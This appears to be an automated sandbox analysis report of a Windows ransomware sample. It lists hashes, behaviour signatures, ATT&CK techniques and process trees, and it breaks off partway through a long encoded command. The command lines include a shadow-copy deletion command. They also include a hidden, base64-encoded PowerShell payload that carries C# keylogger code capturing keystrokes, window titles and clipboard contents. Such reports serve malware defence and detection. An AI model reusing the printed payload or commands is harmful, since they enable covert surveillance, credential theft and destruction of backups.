c0cbd6339026f42a838278795dbf8fa5ac11d8f6fb751e50289847b01a736823

Analysis

max time kernel
150s
max time network
73s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 06:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3b910dce05a7207cd1ad34af2b24e428.exe
Size

388KB
MD5

3b910dce05a7207cd1ad34af2b24e428
SHA1

f3c01d2c305a1b3a737ad2b73c3ba22558fc94f7
SHA256

c0cbd6339026f42a838278795dbf8fa5ac11d8f6fb751e50289847b01a736823
SHA512

8683a976b8f376dee448e285fa396b333444af3164083e93b7ab86902a3ea79a9d241494f9e20112967d3fd35fa881279ffc071791fbf9c5581829bb75a04524
SSDEEP

6144:pOYGXaPNxdgSdcq2pVZPOJHAbKSXXIEmqF4fmq7k3ivPjVbdgZ/:1GqN/XdctpVtkiXXIEduOZij34

Score

10^/10

ransomware

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

wscript.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	560	1756	wscript.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1900	1756	powershell.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 1 IoCs

Processes:

wscript.exe

flow pid process

2 560 wscript.exe
Deletes itself 1 IoCs

Processes:

wscript.exe

pid process

948 wscript.exe

flow	pid	process
2	560	wscript.exe

pid	process
948	wscript.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1068 vssadmin.exe

pid	process
1068	vssadmin.exe

Modifies registry class 4 IoCs

Processes:

wscript.exewscript.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe

pid process

1900 powershell.exe
1900 powershell.exe
1900 powershell.exe
1900 powershell.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

wscript.exe

pid process

948 wscript.exe

pid	process
1900	powershell.exe
1900	powershell.exe
1900	powershell.exe
1900	powershell.exe

pid	process
948	wscript.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

vssvc.exepowershell.exe

description	pid	process
Token: SeBackupPrivilege	1856	vssvc.exe
Token: SeRestorePrivilege	1856	vssvc.exe
Token: SeAuditPrivilege	1856	vssvc.exe
Token: SeDebugPrivilege	1900	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

1900 powershell.exe

pid	process
1900	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

3b910dce05a7207cd1ad34af2b24e428.exewscript.exepowershell.execsc.exe

description	pid	process	target process
PID 1260 wrote to memory of 948	1260	3b910dce05a7207cd1ad34af2b24e428.exe	wscript.exe
PID 1260 wrote to memory of 948	1260	3b910dce05a7207cd1ad34af2b24e428.exe	wscript.exe
PID 1260 wrote to memory of 948	1260	3b910dce05a7207cd1ad34af2b24e428.exe	wscript.exe
PID 1260 wrote to memory of 948	1260	3b910dce05a7207cd1ad34af2b24e428.exe	wscript.exe
PID 948 wrote to memory of 1068	948	wscript.exe	vssadmin.exe
PID 948 wrote to memory of 1068	948	wscript.exe	vssadmin.exe
PID 948 wrote to memory of 1068	948	wscript.exe	vssadmin.exe
PID 948 wrote to memory of 1068	948	wscript.exe	vssadmin.exe
PID 1900 wrote to memory of 1888	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 1888	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 1888	1900	powershell.exe	csc.exe
PID 1888 wrote to memory of 360	1888	csc.exe	cvtres.exe
PID 1888 wrote to memory of 360	1888	csc.exe	cvtres.exe
PID 1888 wrote to memory of 360	1888	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\3b910dce05a7207cd1ad34af2b24e428.exe
"C:\Users\Admin\AppData\Local\Temp\3b910dce05a7207cd1ad34af2b24e428.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1260

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\wscript.exe" 279155113.js 118 "C:\Users\Admin\AppData\Local\Temp\3b910dce05a7207cd1ad34af2b24e428.exe"
2⤵
- Deletes itself
- Modifies registry class
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\SysWOW64\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:1068

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\8e28fefd0.js" 118
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
PID:560

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGoAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABmADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABwADMAIABvADQAIAA9ACAAYwA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAagA2ACAAbgA3ACAAPQAgAGwAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAYQA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABoADEAMAAgAG8AMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGIAMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAG8AMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAG4AMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGgAMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAG8AMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGoAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABlADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAcAAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGYAMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABoADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYQAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGkAMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABlADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYgAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGoAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABkADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGMAMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAG0AMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGIAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAHAAMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAG4AMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAG0AMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABnADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGgAMQAwACAAaQAzADUAKQB7AG8AMQAxACAAPQAgAGkAMwA1ADsAagAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AHAAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AGYAMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAHAAMQA5ADsAagAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAXwBfAFUASQBEAF8ARQBOAFYAXwBWAEEAUgBfAF8AIgApADsAaQBmACAAKABqADIANgAgAD0APQAgAG4AdQBsAGwAKQAgAGoAMgA2ACAAPQAgACIAMQAyADMANAA1ADYANwA4ACIAOwBoADIAMQAgAD0AIABqADIANgAgACsAIAAiAGEAIgA7AGEAMgAyACAAPQAgAGoAMgA2ACAAKwAgACIAZAAiADsAaQAyADMAIAA9ACAAagAyADYAIAArACAAIgBzACIAOwBlADIANAAgAD0AIABqADIANgAgACsAIAAiAG0AIgA7AHUAaQBuAHQAIABoADMANgAgAD0AIABPAHAAZQBuAE0AdQB0AGUAeAAoADAAeAAwADAAMQAwADAAMAAwADAALAAgAGYAYQBsAHMAZQAsACAAZQAyADQAKQA7AGkAZgAgACgAaAAzADYAIAAhAD0AIAAwACkAIABFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAAwACkAOwBDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgAHQAcgB1AGUALAAgAGUAMgA0ACkAOwBkADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBpAGYAIAAoAFMAQwBhAHIAZABFAHMAdABhAGIAbABpAHMAaABDAG8AbgB0AGUAeAB0ACgAMgAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgAG8AdQB0ACAAZAAyADcAKQAgACEAPQAgADAAKQAgAGQAMgA3ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AGUAMQA4ACAAPQAgACIAIgA7AG8AMQAzACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAaQBuAHQAIABkADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAbwAxADMAKQA7AG8AMQA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoAGQAMwA3ACAAKwAgADEAKQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABvADEAMwAsACAAbwAxADYALAAgAGQAMwA3ACAAKwAgADEAKQA7AHUAaQBuAHQAIABuADEANAAgAD0AIAAwADsARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABvADEAMwAsACAAcgBlAGYAIABuADEANAApADsAUAByAG8AYwBlAHMAcwAgAGEAMwA4ACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAbgAxADQAKQA7AGkAZgAgACgAYQAzADgAIAAhAD0AIABuAHUAbABsACkAIABiADIANQAgAD0AIABhADMAOAAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7ACAAZQBsAHMAZQAgAGIAMgA1ACAAPQAgACIAIgA7AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAAwACwAIABuADcALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACkAOwBhADkAIAA9ACAAZQAzADkAKABvADQAKQA7AEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFIAdQBuACgAKQA7AFUAbgBoAG8AbwBrAFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABhADkAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABlADMAOQAoAHAAMwAgAG8ANAApAHsASQBuAHQAUAB0AHIAIABrADQAMAAgAD0AIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAoAFAAcgBvAGMAZQBzAHMALgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAE0AbwBkAHUAbABlAE4AYQBtAGUAKQA7AHIAZQB0AHUAcgBuACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoADEAMwAsACAAbwA0ACwAIABrADQAMAAsACAAMAApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAaQA0ADEAKABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAaQA0ADIALAAgAHMAdAByAGkAbgBnACAAcAA0ADMALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABsADQANAApAHsAdAByAHkAewBzAHQAcgBpAG4AZwAgAGMANAA1AGQAYQB0AGEAXwAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBHAGUAdABWAGEAbAB1AGUAKABmADIAMAAsACAAaAAyADEALAAgACIAIgApAC4AVABvAFMAdAByAGkAbgBnACgAKQA7AGMANAA1AGQAYQB0AGEAXwAgAD0AIABjADQANQBkAGEAdABhAF8AIAArACAARABhAHQAZQBUAGkAbQBlAC4ATgBvAHcAIAArACAAIgAgAFsAIgAgACsAIABpADQAMgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAIgBdACAALQAgACIAIAArACAAcAA0ADMAIAArACAAIgBcAHIAXABuACIAIAArACAAbAA0ADQALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXAByAFwAbgBcAHIAXABuACIAOwBSAGUAZwBpAHMAdAByAHkALgBTAGUAdABWAGEAbAB1AGUAKABmADIAMAAsACAAaAAyADEALAAgAGMANAA1AGQAYQB0AGEAXwApADsAfQBjAGEAdABjAGgAIAB7ACAAfQB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGkAbgB0ACAAZwA0ADYAKABJAG4AdABQAHQAcgAgAGoANAA3ACkAewByAGUAdAB1AHIAbgAgAE0AYQByAHMAaABhAGwALgBSAGUAYQBkAEkAbgB0ADMAMgAoAGoANAA3ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABkAGUAbABlAGcAYQB0AGUAIABJAG4AdABQAHQAcgAgAHAAMwAoAGkAbgB0ACAAZAA0ADgALAAgAEkAbgB0AFAAdAByACAAbQA0ADkALAAgAEkAbgB0AFAAdAByACAAYQA1ADAAKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdQBpAG4AdAAgAGoANgAoAEkAbgB0AFAAdAByACAAcABQAGEAcgBhAG0AKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdgBvAGkAZAAgAGgAMQAwACgAKQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAYwA1ACgAaQBuAHQAIABkADQAOAAsACAASQBuAHQAUAB0AHIAIABtADQAOQAsACAASQBuAHQAUAB0AHIAIABhADUAMAApAHsAaQBmACAAKABkADQAOAAgAD4APQAgADAAIAAmACYAIABtADQAOQAgAD0APQAgACgASQBuAHQAUAB0AHIAKQAwAHgAMAAxADAAMAApAHsAaQBuAHQAIABsADUAMQAgAD0AIABnADQANgAoAGEANQAwACkAOwBpAGYAIAAoAGwANQAxACAAPAAgADgAKQAgAHIAZQB0AHUAcgBuACAAQwBhAGwAbABOAGUAeAB0AEgAbwBvAGsARQB4ACgAYQA5ACwAIABkADQAOAAsACAAbQA0ADkALAAgAGEANQAwACkAOwBvADEAMQAoACkAOwBiAG8AbwBsACAAbgA1ADIAIAA9ACAAKABsADUAMQAgAD0APQAgADgAKQA7AGIAbwBvAGwAIABmADUAMwAgAD0AIAAoAGwANQAxACAAPQA9ACAANAA2ACkAOwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAZgA1ADQAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGIAeQB0AGUAWwBdACAAZAA1ADUAIAAgAD0AIABuAGUAdwAgAGIAeQB0AGUAWwAyADUANQBdADsAaQBmACAAKABHAGUAdABLAGUAeQBiAG8AYQByAGQAUwB0AGEAdABlACgAZAA1ADUAKQApAHsAdQBpAG4AdAAgAGIANQA2ACAAPQAgAE0AYQBwAFYAaQByAHQAdQBhAGwASwBlAHkAKABsADUAMQAsACAAMwApADsAYgAxADIAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwB1AGkAbgB0ACAAZwA1ADcAIAA9ACAAMAA7AHUAaQBuAHQAIABlADUAOAAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAGIAMQAyACwAIAByAGUAZgAgAGcANQA3ACkAOwB1AGkAbgB0ACAAaQA1ADkAIAA9ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAEwAYQB5AG8AdQB0ACgAZQA1ADgAKQA7AGkAZgAgACgAbgA1ADIAIAB8AHwAIABmADUAMwAgAHwAfAAgACgAVABvAFUAbgBpAGMAbwBkAGUARQB4ACgAbAA1ADEALAAgAGIANQA2ACwAIABkADUANQAsACAAZgA1ADQALAAgAGYANQA0AC4AQwBhAHAAYQBjAGkAdAB5ACwAIAAoAHUAaQBuAHQAKQAwACwAIABpADUAOQApACAAPgAgADAAKQApAHsAaQBuAHQAIABkADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAYgAxADIAKQA7AGgAMQA1ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoAGQAMwA3ACAAKwAgADEAKQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABiADEAMgAsACAAaAAxADUALAAgAGQAMwA3ACAAKwAgADEAKQA7AGkAZgAgACgAKABnADUANwAgACEAPQAgAG4AMQA0ACkAIAB8AHwAIAAoAGIAMQAyACAAIQA9ACAAbwAxADMAKQAgAHwAfAAgACgAbwAxADYALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAIQA9ACAAaAAxADUALgBUAG8AUwB0AHIAaQBuAGcAKAApACkAKQB7AGkANAAxACgAbwAxADYALAAgAGIAMgA1ACwAIABqADEANwApADsAbwAxADYALgBSAGUAbQBvAHYAZQAoADAALAAgAG8AMQA2AC4ATABlAG4AZwB0AGgAKQA7AG8AMQA2AC4AQQBwAHAAZQBuAGQAKABoADEANQApADsAagAxADcALgBSAGUAbQBvAHYAZQAoADAALAAgAGoAMQA3AC4ATABlAG4AZwB0AGgAKQA7AG8AMQAzACAAPQAgAGIAMQAyADsAUAByAG8AYwBlAHMAcwAgAGEAMwA4ACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAZwA1ADcAKQA7AGkAZgAgACgAYQAzADgAIAAhAD0AIABuAHUAbABsACkAIABiADIANQAgAD0AIABhADMAOAAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7ACAAZQBsAHMAZQAgAGIAMgA1ACAAPQAgACIAIgA7AG4AMQA0ACAAPQAgAGcANQA3ADsAfQBpAGYAIAAoAGwANQAxACAAPgAgADcAKQB7AGkAZgAgACgAbgA1ADIAKQAgAGoAMQA3AC4AQQBwAHAAZQBuAGQAKAAiAFsAqwBdACIAKQA7AGUAbABzAGUAIABpAGYAIAAoAGYANQAzACkAIABqADEANwAuAEEAcABwAGUAbgBkACgAIgBbAGQAZQBsAF0AIgApADsAZQBsAHMAZQAgAGoAMQA3AC4AQQBwAHAAZQBuAGQAKABmADUANAApADsAfQB9AH0AfQByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAGEAOQAsACAAZAA0ADgALAAgAG0ANAA5ACwAIABhADUAMAApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABMAGkAcwB0ADwAcwB0AHIAaQBuAGcAPgAgAGMANgAwACgAYgB5AHQAZQBbAF0AIABiADYAMQApAHsAcwB0AHIAaQBuAGcAIABiADYAMgAgAD0AIABFAG4AYwBvAGQAaQBuAGcALgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAGIANgAxACkAOwBpAGYAIAAoAHMAdAByAGkAbgBnAC4ASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoAGIANgAyACkAKQAgAHIAZQB0AHUAcgBuACAAbgBlAHcAIABMAGkAcwB0ADwAcwB0AHIAaQBuAGcAPgAoACkAOwByAGUAdAB1AHIAbgAgAG4AZQB3ACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AKABiADYAMgAuAFMAcABsAGkAdAAoAG4AZQB3ACAAYwBoAGEAcgBbAF0AIAB7ACAAJwBcADAAJwAgAH0ALAAgAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAC4AUgBlAG0AbwB2AGUARQBtAHAAdAB5AEUAbgB0AHIAaQBlAHMAKQApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB1AGkAbgB0ACAAbAA4ACgASQBuAHQAUAB0AHIAIABwADYAMwApAHsAYgBvAG8AbAAgAGgANgA0ACAAPQAgAHQAcgB1AGUAOwBzAHQAcgBpAG4AZwAgAHAANgA1ADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGkANgA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwB3AGgAaQBsAGUAIAAoAGgANgA0ACkAewBzAHQAcgBpAG4AZwAgAGsANgA3ACAAPQAgAFIAZQBnAGkAcwB0AHIAeQAuAEcAZQB0AFYAYQBsAHUAZQAoAGYAMgAwACwAIABpADIAMwAsACAAIgAiACkALgBUAG8AUwB0AHIAaQBuAGcAKAApADsAaQBmACAAKABrADYANwAgACEAPQAgACIAIgApAHsAUgBlAGcAaQBzAHQAcgB5AEsAZQB5ACAAaQA2ADgAIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4AQwB1AHIAcgBlAG4AdABVAHMAZQByAC4ATwBwAGUAbgBTAHUAYgBLAGUAeQAoAHAAMQA5ACwAIAB0AHIAdQBlACkAOwBpAGYAIAAoAGkANgA4ACAAIQA9ACAAbgB1AGwAbAApAHsAaQA2ADgALgBEAGUAbABlAHQAZQBWAGEAbAB1AGUAKABpADIAMwApADsAaQA2ADgALgBDAGwAbwBzAGUAKAApADsAfQBFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAAwACkAOwB9AGkAZgAgACgAQwBsAGkAcABiAG8AYQByAGQALgBDAG8AbgB0AGEAaQBuAHMAVABlAHgAdAAoACkAIAA9AD0AIAB0AHIAdQBlACkAewBwADYANQAgAD0AIABDAGwAaQBwAGIAbwBhAHIAZAAuAEcAZQB0AFQAZQB4AHQAKAApADsAaQBmACAAKABwADYANQAgACEAPQAgAGUAMQA4ACkAewBzAHQAcgBpAG4AZwAgAGsANgA5ACAAPQAgACIAIgA7AFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABmADcAMAAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKAApADsAYgAxADIAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwBpAGYAIAAoAGIAMQAyACAAIQA9ACAAMAApAHsAaQBuAHQAIABkADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAYgAxADIAKQA7AGYANwAwAC4AQwBhAHAAYQBjAGkAdAB5ACAAPQAgAGQAMwA3ACAAKwAgADEAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAYgAxADIALAAgAGYANwAwACwAIABkADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAXwBwAHIAbwBjAF8AaQBkAF8AIAA9ACAAMAA7AGkAZgAgACgARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABiADEAMgAsACAAcgBlAGYAIABfAHAAcgBvAGMAXwBpAGQAXwApACAAIQA9ACAAMAApAHsAUAByAG8AYwBlAHMAcwAgAGEANwAxACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHI